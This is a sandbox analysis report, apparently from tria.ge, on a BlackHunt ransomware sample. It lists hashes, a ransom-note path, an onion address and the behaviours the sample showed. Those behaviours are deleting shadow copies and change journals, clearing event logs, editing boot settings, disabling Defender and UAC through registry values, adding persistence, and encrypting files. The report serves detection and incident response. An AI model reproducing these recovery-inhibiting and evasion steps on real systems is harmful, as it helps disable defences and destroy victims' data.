Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:08
Static task
static1
Behavioral task
behavioral1
Sample
901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe
Resource
win10v2004-20231215-en
General
-
Target
901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe
-
Size
707KB
-
MD5
0f7c24c5efc29fce2c579218c0795c63
-
SHA1
f4dd63495559df167fd280d9f860f94ef8e2a1bb
-
SHA256
901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0
-
SHA512
3d002b8dcb013818eae846dd14bbc8b7ff73d1c441e51964f5dc61c873e48cf29fb35440b74431fde0e6ff06c4c69bb0f6004957e9581f9531b63dd345c7f700
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1s8qvnh:6uaTmkZJ+naie5OTamgEoKxLWHkh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5724 fsutil.exe 3492 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection Conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 10280 wevtutil.exe 2288 wevtutil.exe 4956 wevtutil.exe 9108 wevtutil.exe 6976 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9840 bcdedit.exe 5672 bcdedit.exe 12104 bcdedit.exe 5392 bcdedit.exe -
Renames multiple (3375) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8880 wbadmin.exe 10844 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\I: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\A: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\W: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\Y: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\H: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\L: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\N: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\J: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\Q: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\P: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\S: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\K: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\G: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\Z: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\V: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\B: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\M: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\R: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\X: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened (read-only) \??\T: 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-ae\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main-selector.css 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#BlackHunt_ReadMe.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-gb\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#BlackHunt_ReadMe.hta 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark.png 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\ui-strings.js 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#BlackHunt_Private.key 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\glib.md 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6924 6444 WerFault.exe 293 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6204 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7588 vssadmin.exe 6844 vssadmin.exe 5628 vssadmin.exe 11828 vssadmin.exe 9184 vssadmin.exe 5268 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 9440 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5888 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeRestorePrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeBackupPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeTakeOwnershipPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeAuditPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeSecurityPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeIncBasePriorityPrivilege 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Token: SeBackupPrivilege 6864 wbengine.exe Token: SeRestorePrivilege 6864 wbengine.exe Token: SeSecurityPrivilege 6864 wbengine.exe Token: SeBackupPrivilege 6780 vssvc.exe Token: SeRestorePrivilege 6780 vssvc.exe Token: SeAuditPrivilege 6780 vssvc.exe Token: SeSecurityPrivilege 9108 wevtutil.exe Token: SeBackupPrivilege 9108 wevtutil.exe Token: SeSecurityPrivilege 4956 wevtutil.exe Token: SeBackupPrivilege 4956 wevtutil.exe Token: SeSecurityPrivilege 2288 wevtutil.exe Token: SeBackupPrivilege 2288 wevtutil.exe Token: SeSecurityPrivilege 10280 wevtutil.exe Token: SeBackupPrivilege 10280 wevtutil.exe Token: SeSecurityPrivilege 6976 wevtutil.exe Token: SeBackupPrivilege 6976 wevtutil.exe Token: SeDebugPrivilege 9440 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3448 wrote to memory of 1096 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 90 PID 3448 wrote to memory of 1096 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 90 PID 3448 wrote to memory of 3040 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 92 PID 3448 wrote to memory of 3040 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 92 PID 3448 wrote to memory of 4968 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 94 PID 3448 wrote to memory of 4968 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 94 PID 3448 wrote to memory of 3412 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 96 PID 3448 wrote to memory of 3412 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 96 PID 3448 wrote to memory of 2384 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 98 PID 3448 wrote to memory of 2384 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 98 PID 3448 wrote to memory of 1548 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 100 PID 3448 wrote to memory of 1548 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 100 PID 1096 wrote to memory of 464 1096 cmd.exe 101 PID 1096 wrote to memory of 464 1096 cmd.exe 101 PID 3448 wrote to memory of 1908 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 103 PID 3448 wrote to memory of 1908 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 103 PID 3448 wrote to memory of 3992 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 105 PID 3448 wrote to memory of 3992 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 105 PID 3448 wrote to memory of 3856 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 108 PID 3448 wrote to memory of 3856 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 108 PID 3412 wrote to memory of 412 3412 cmd.exe 164 PID 3412 wrote to memory of 412 3412 cmd.exe 164 PID 3448 wrote to memory of 1572 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 109 PID 3448 wrote to memory of 1572 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 109 PID 3448 wrote to memory of 2108 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 111 PID 3448 wrote to memory of 2108 3448 